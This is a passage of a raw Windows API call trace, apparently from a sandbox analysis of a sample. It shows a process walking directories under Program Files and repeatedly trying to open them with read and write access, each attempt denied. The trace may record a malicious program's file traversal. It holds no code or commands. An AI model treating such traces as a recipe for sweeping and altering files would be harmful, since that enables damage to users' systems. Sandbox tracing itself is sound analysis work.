[0102.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0102.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0102.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0102.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0102.563] AreFileApisANSI () returned 1 [0102.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US", lpUsedDefaultChar=0x0) returned 62 [0102.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0102.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0102.563] AreFileApisANSI () returned 1 [0102.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0102.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e828 [0102.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6e828, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US") returned 62 [0102.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.564] GetLastError () returned 0x5 [0102.564] GetLastError () returned 0x5 [0102.564] SetLastError (dwErrCode=0x5) [0102.564] GetLastError () returned 0x5 [0102.564] SetLastError (dwErrCode=0x5) [0102.564] GetLastError () returned 0x5 [0102.564] SetLastError (dwErrCode=0x5) [0102.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0102.564] AreFileApisANSI () returned 1 [0102.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0102.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e140 [0102.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6e140, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US") returned 62 [0102.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.564] GetLastError () returned 0x5 [0102.564] GetLastError () returned 0x5 [0102.564] SetLastError (dwErrCode=0x5) [0102.564] GetLastError () returned 0x5 [0102.564] SetLastError (dwErrCode=0x5) [0102.564] GetLastError () returned 0x5 [0102.565] SetLastError (dwErrCode=0x5) [0102.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0102.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0102.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0102.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0102.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0102.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0102.565] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x7a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x82a80, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x7a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="")) returned 0 [0102.565] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0102.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0102.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0102.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0102.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0102.565] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77fd0 [0102.565] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.566] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0102.566] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0102.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0102.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0102.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0102.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0102.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0102.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0102.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0102.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0102.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0102.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0102.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ac50 [0102.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0102.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0102.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0102.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0102.567] AreFileApisANSI () returned 1 [0102.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit", lpUsedDefaultChar=0x0) returned 55 [0102.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0102.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0102.567] AreFileApisANSI () returned 1 [0102.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0102.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76020 [0102.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit") returned 55 [0102.568] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.568] GetLastError () returned 0x5 [0102.568] GetLastError () returned 0x5 [0102.568] SetLastError (dwErrCode=0x5) [0102.568] GetLastError () returned 0x5 [0102.568] SetLastError (dwErrCode=0x5) [0102.568] GetLastError () returned 0x5 [0102.568] SetLastError (dwErrCode=0x5) [0102.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0102.568] AreFileApisANSI () returned 1 [0102.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0102.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75d50 [0102.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit") returned 55 [0102.568] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.568] GetLastError () returned 0x5 [0102.568] GetLastError () returned 0x5 [0102.569] SetLastError (dwErrCode=0x5) [0102.569] GetLastError () returned 0x5 [0102.569] SetLastError (dwErrCode=0x5) [0102.569] GetLastError () returned 0x5 [0102.569] SetLastError (dwErrCode=0x5) [0102.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0102.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0102.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a9f0 [0102.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0102.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0102.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0102.569] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xbcd0fab8, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xa0b594b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2ce22546, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="VC", cAlternateFileName="")) returned 1 [0102.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0102.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0102.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0102.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0102.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0102.569] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x784d0 [0102.570] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b57d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.570] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0102.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0102.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0102.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45ef8 [0102.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0102.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0102.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0102.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0102.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0102.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0102.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0102.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0102.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0102.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0102.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0102.570] AreFileApisANSI () returned 1 [0102.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US", lpUsedDefaultChar=0x0) returned 61 [0102.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0102.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0102.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.571] AreFileApisANSI () returned 1 [0102.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0102.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US") returned 61 [0102.571] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.571] GetLastError () returned 0x5 [0102.571] GetLastError () returned 0x5 [0102.571] SetLastError (dwErrCode=0x5) [0102.571] GetLastError () returned 0x5 [0102.571] SetLastError (dwErrCode=0x5) [0102.571] GetLastError () returned 0x5 [0102.571] SetLastError (dwErrCode=0x5) [0102.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0102.571] AreFileApisANSI () returned 1 [0102.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0102.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6ecf0, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US") returned 61 [0102.571] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, 